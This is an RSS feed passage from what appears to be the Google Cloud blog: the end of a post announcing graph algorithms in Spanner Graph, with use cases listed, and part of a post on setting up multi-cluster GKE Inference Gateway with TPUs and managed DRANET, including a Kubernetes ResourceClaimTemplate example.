&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Now with native support for algorithms in &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Spanner Graph you can move beyond basic relationship traversals and run deep structural analytics directly on your freshest transaction data. By applying these classic graph algorithms at scale, you can unlock new capabilities for your enterprise applications:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Proactive fraud detection and anti-money laundering&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Expose coordinated fraud rings by automatically grouping connected mule accounts with Community Detection (like modularity clustering), then apply centrality (like PageRank) to pinpoint the ringleader &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;who controls the illegal fund flow.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Customer 360 and entity resolution&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Unify fragmented, cross-channel data into a single canonical profile using similarity functions like Jaccard and community detection like label propagation. These profiles can be further enriched for downstream ML training by generating topological features, such as PageRank, for each node.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Autonomous network operations and digital twins&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Model your IT or telecom infrastructure as a digital twin, using similarity and path finding (like set-to-set shortest path) to proactively identify critical vulnerabilities and predict cascading failures.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Hyper-personalized product recommendations&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Move beyond basic purchase histories by analyzing broader user behaviors. Use similarity algorithms (like common neighbors) to find overlapping preferences between entities, and centrality (like personalized PageRank) to surface the most relevant recommendations for those peer groups.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Resilient supply chain and logistics&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Protect your supply chain from hidden bottlenecks using centrality (like betweenness centrality) to pinpoint over-relied-upon distribution hubs, and path finding to instantly calculate efficient alternative routes during disruptions.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Cybersecurity threat hunting and blast-radius analysis&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Accelerate threat hunting by applying community detection (like correlation clustering) to isolate anomalous machine communications, and path finding to trace the attacker's exact lateral movement and blast radius.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Predictive customer churn analysis&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Stop contagious customer churn by mapping out tight-knit subscriber groups with community detection, then apply centrality to identify and target core influencers with retention promotions before the churn spreads.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Get started today&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Spanner Graph &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;algorithms&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; are supported with the Enterprise and Enterprise+ editions of Spanner. To learn more, view the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/spanner/docs/graph/graph-algorithms-overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; or try out this &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/spanner-graph-algorithms" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;codelab&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. You can also watch &lt;/span&gt;&lt;a href="https://youtu.be/mlmcaB2mLOs?si=U-mdC0ZF8Nyli6Rx" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;this video&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for a summary of graph algorithm support with Spanner Graph.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Tue, 02 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/databases/introducing-spanner-graph-algorithms/</guid><category>Spanner</category><category>Databases</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Announcing Spanner Graph algorithms: Google-grade intelligence for connected data</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/products/databases/introducing-spanner-graph-algorithms/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Bei Li</name><title>Sr. Staff Software Engineer</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Vahab Mirrokni</name><title>VP, Google Fellow, Graph Mining, Google Research</title><department></department><company></company></author></item><item><title>Experimenting with TPUs, GKE Managed DRANET, and Multi-cluster Inference Gateway</title><link>https://cloud.google.com/blog/topics/developers-practitioners/experimenting-with-tpus-gke-managed-dranet-and-multi-cluster-inference-gateway/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;What happens when your workload fails in one region but you need access to service? This is a common case for availability and uptime. With recent enhancement to the Kubernetes ecosystem and capabilities like &lt;/span&gt;&lt;a href="https://kubernetes.io/docs/concepts/scheduling-eviction/dynamic-resource-allocation/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Dynamic Resource Allocation (DRA)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://gateway-api-inference-extension.sigs.k8s.io/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Inference Gateway.&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;span style="vertical-align: baseline;"&gt;I decided to experiment with these capabilities in Google Cloud for a simple test using an AI inference workload.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In this blog, we will explore this setup and you can also jump straight into the detailed configs in this codelab &lt;/span&gt;&lt;a href="https://codelabs.developers.google.com/codelabs/gke-inference-gateway-multi-cluster-tpus-dranet#0" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Build multi-cluster GKE Inference Gateway, with TPUs , Cloud Storage FUSE and managed DRANET.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Building blocks &lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To build out this experiment, use the following products, features, and tools:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Google Kubernetes Engine &lt;/span&gt;&lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/allocate-network-resources-dra"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;(GKE) managed DRANET&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: This is a managed feature that lets you request and share resources among Pods. This supports &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/allocate-network-resources-dra#use-rdma-interfaces-gpu"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GPUs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/allocate-network-resources-dra#use-non-rdma-interfaces-tpu"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;TPUs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. In this test TPUs were used in two different regions with networking assigned using managed DRANET.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/about-multi-cluster-inference-gateway"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;&lt;strong&gt;Multi-cluster GKE Inference gateway&lt;/strong&gt;&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: Load balances your AI/ML inference workloads across multiple GKE clusters. This works in a failover situation which is what my experiment intended to test. The type which supports this is the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/gateway-api#gatewayclass"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Multi-cluster Cross-region internal Application Load Balancer&lt;/span&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;code style="vertical-align: baseline;"&gt;gke-l7-cross-regional-internal-managed-mc&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://docs.cloud.google.com/storage/docs/cloud-storage-fuse/overview"&gt;&lt;strong&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Storage FUSE&lt;/span&gt;&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: Provides a way to store data, models, checkpoints, and logs directly in Cloud Storage. To speed up the deployment, an open source gemma model was downloaded to this storage for retrieval. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Virtual private Cloud (VPC)&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The foundational global network providing isolated, secure communication for the internal load balancers and compute nodes&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/fleets-overview"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;GKE Fleets&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: Fleets group the separate regional clusters under a unified management control plane&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;a href="https://docs.cloud.google.com/tpu/docs/v6e"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;TPU v6e&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Google's custom AI accelerators that provide the high-performance compute required to serve the model. The VM family type used was the  &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ct6e-standard-4t&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; in a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/tpu/docs/v6e#configurations"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;2x2 Slice&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Design pattern example&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;The aim is to deploy a LLM model (Gemma 3) onto 2 GKE clusters in different regions. Each cluster will use 4 TPU v6e chips. The model should be stored in Cloud Storage. The workload is served using GKE Inference Gateway which supports multi-clusters. The traffic should be routed to the region closest to the user and failover to the other region if one region fails.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1-build.max-1000x1000.png"
        
          alt="1-build"&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div data-draftjs-conductor-fragment='{"blocks":[{"key":"ct469","text":"Putting it together","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"a673f","text":"To get access to the TPUs for your project in two regions you have to ensure you have the necessary quota in those regions.","type":"unstyled","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":90,"length":15,"key":0}],"data":{}},{"key":"8ufpl","text":"Begin: Set up the environment","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":6,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"3hun0","text":"Create a standard VPC, with firewall rules and subnet in the same zone as the reservation.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":9,"length":12,"key":1}],"data":{}},{"key":"afkbe","text":"Create a proxy-only subnet this will be used with the Internal regional application load balancer attached to the GKE inference gateway.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":9,"length":17,"key":2}],"data":{}},{"key":"23sv0","text":"Set up firewall rules allowing traffic and health checks.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"b83on","text":"Reserve static internal IP addresses in both regions for the Gateway.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"5sqev","text":"Provision a Cloud Storage FUSE bucket and configure a dedicated IAM Service Account. Bind this to a Kubernetes Workload Identity so your pods can securely mount the bucket and read the model weights directly.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"65eu0","text":"Next: Create standard GKE clusters and node pools","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":49,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"3nj2n","text":"Deploy two separate GKE clusters in your chosen regions configured.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"d6395","text":"Enable the Gateway API (--gateway-api=standard) and the Cloud Storage FUSE CSI driver (--addons GcsFuseCsiDriver) during cluster creation.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[{"offset":24,"length":22,"style":"CODE"},{"offset":87,"length":25,"style":"CODE"},{"offset":24,"length":22,"style":"ITALIC"},{"offset":87,"length":25,"style":"ITALIC"}],"entityRanges":[{"offset":55,"length":30,"key":3}],"data":{}},{"key":"37hd5","text":"Create dedicated TPU v6e node pools (ct6e-standard-4t) for both clusters.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[{"offset":37,"length":16,"style":"CODE"},{"offset":37,"length":16,"style":"ITALIC"}],"entityRanges":[],"data":{}},{"key":"e6o1h","text":"Enable managed DRANET on these TPU node pools by setting the flags\n ---accelerator-network-profile=auto, and\n --node-labels=cloud.google.com/gke-networking-dra-driver=true.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[{"offset":68,"length":35,"style":"CODE"},{"offset":110,"length":61,"style":"CODE"},{"offset":68,"length":35,"style":"ITALIC"},{"offset":110,"length":62,"style":"ITALIC"}],"entityRanges":[{"offset":31,"length":14,"key":4}],"data":{}},{"key":"e6iod","text":"Next: Establish the global mesh via Fleet Registration","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":54,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"8nj7o","text":"Register both GKE clusters to a unified GKE Fleet by following the fleet creation and registration setup.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[{"offset":66,"length":38,"key":5}],"data":{}},{"key":"6f71o","text":"Enable Multi-Cluster Service Discovery and Multi-Cluster Ingress on your fleet.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"cbent","text":"Designate your primary region as the configuration hub to act as the control plane for routing rules across both regions.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}},{"key":"2k3c3","text":"Next: Deploy the AI Workload","type":"unstyled","depth":0,"inlineStyleRanges":[{"offset":0,"length":28,"style":"BOLD"}],"entityRanges":[],"data":{}},{"key":"b56k8","text":"Use a temporary Kubernetes job to download the Gemma 3 (gemma-3-27b-it) model weights directly into your Cloud Storage bucket.","type":"unordered-list-item","depth":0,"inlineStyleRanges":[{"offset":56,"length":14,"style":"CODE"},{"offset":56,"length":14,"style":"ITALIC"}],"entityRanges":[],"data":{}},{"key":"lihp","text":"Define a ResourceClaimTemplate that explicitly requests the managed DRANET device class (deviceClassName: netdev.google.com) with the allocation mode set to \"All\".","type":"unordered-list-item","depth":0,"inlineStyleRanges":[{"offset":9,"length":21,"style":"CODE"},{"offset":89,"length":34,"style":"CODE"},{"offset":9,"length":21,"style":"ITALIC"},{"offset":89,"length":34,"style":"ITALIC"}],"entityRanges":[],"data":{}}],"entityMap":{"0":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://docs.cloud.google.com/kubernetes-engine/docs/how-to/tpus#ensure-quota-od-spot"}},"1":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://docs.cloud.google.com/vpc/docs/create-modify-vpc-networks#create-custom-network"}},"2":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://docs.cloud.google.com/load-balancing/docs/proxy-only-subnets#proxy_only_subnet_create"}},"3":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://cloud.google.com/kubernetes-engine/docs/concepts/cloud-storage-fuse-csi-driver"}},"4":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://docs.cloud.google.com/kubernetes-engine/docs/how-to/allocate-network-resources-dra#enable-dra-driver-tpu"}},"5":{"type":"LINK","mutability":"MUTABLE","data":{"url":"https://cloud.google.com/kubernetes-engine/docs/how-to/creating-fleets"}}}}'&gt;
&lt;h2 class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="czag4-0-0"&gt;&lt;span data-offset-key="czag4-0-0"&gt;Putting it together&lt;/span&gt;&lt;/h2&gt;
&lt;div class="Draftail-block--unstyled" data-block="true" data-editor="4apjo" data-offset-key="31jqe-0-0"&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="31jqe-0-0"&gt;&lt;span data-offset-key="31jqe-0-0"&gt;To get access to the TPUs for your project in two regions you have to ensure you have the &lt;/span&gt;&lt;a class="TooltipEntity" data-draftail-trigger="true" href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/tpus#ensure-quota-od-spot" role="button"&gt;&lt;span data-offset-key="31jqe-1-0"&gt;necessary quota&lt;/span&gt;&lt;/a&gt;&lt;span data-offset-key="31jqe-2-0"&gt; in those regions.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="Draftail-block--unstyled" data-block="true" data-editor="4apjo" data-offset-key="9e8ff-0-0"&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="9e8ff-0-0"&gt; &lt;/div&gt;
&lt;div class="public-DraftStyleDefault-block public-DraftStyleDefault-ltr" data-offset-key="9e8ff-0-0"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Begin:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Set up the environment. &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/vpc/docs/create-modify-vpc-networks#create-custom-network"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;standard VPC&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, with firewall rules and subnet in the same zone as the reservation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/load-balancing/docs/proxy-only-subnets#proxy_only_subnet_create"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;proxy-only subnet&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; this will be used with the Internal regional application load balancer attached to the GKE inference gateway&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Set up firewall rules allowing traffic and health checks.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Reserve static internal IP addresses in both regions for the Gateway.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Provision a Cloud Storage FUSE bucket and configure a dedicated IAM Service Account. Bind this to a Kubernetes Workload Identity so your pods can securely mount the bucket and read the model weights directly.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Next: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Create standard GKE clusters and node pools.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy two separate GKE clusters in your chosen regions configured.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Enable the Gateway API (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;--gateway-api=standard&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) and the&lt;/span&gt;&lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/cloud-storage-fuse-csi-driver"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud Storage FUSE CSI driver&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;--addons GcsFuseCsiDriver&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) during cluster creation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Create dedicated TPU v6e node pools (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ct6e-standard-4t&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) for both clusters.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Enable managed DRANET on these &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/allocate-network-resources-dra#enable-dra-driver-tpu"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;TPU node pools&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; by setting the flags &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;---accelerator-network-profile=auto&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;--node-labels=cloud.google.com/gke-networking-dra-driver=true&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Next: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Establish the global mesh via Fleet Registration.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Register both GKE clusters to a unified GKE Fleet by following the&lt;/span&gt;&lt;a href="https://cloud.google.com/kubernetes-engine/docs/how-to/creating-fleets"&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;fleet creation and registration setup&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Enable Multi-Cluster Service Discovery and Multi-Cluster Ingress on your fleet.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Designate your primary region as the configuration hub to act as the control plane for routing rules across both regions.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Next: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy the AI workload.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Use a temporary Kubernetes job to download the Gemma 3 (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;gemma-3-27b-it&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) model weights directly into your Cloud Storage bucket.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Define a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;ResourceClaimTemplate&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; that explicitly requests the managed DRANET device class (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;deviceClassName: netdev.google.com&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; ) with the allocation mode set to "All".&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: resource.k8s.io/v1\r\nkind: ResourceClaimTemplate\r\nmetadata:\r\n  name: all-netdev\r\n  namespace: default\r\nspec:\r\n  spec:\r\n    devices:\r\n      requests:\r\n      - name: req-netdev\r\n        exactly:\r\n          deviceClassName: netdev.google.com\r\n          allocationMode: All&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe9d1ddf1f0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy your inference server (e.g. vLLM) on the TPU nodes in both regions. Ensure the pod spec utilizes node selectors for the 2x2 TPU topology, requests exactly 4 TPUs, and mounts the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;netdev&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; claim. This guarantees your pods utilize the dedicated accelerator networking alongside standard Ethernet.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
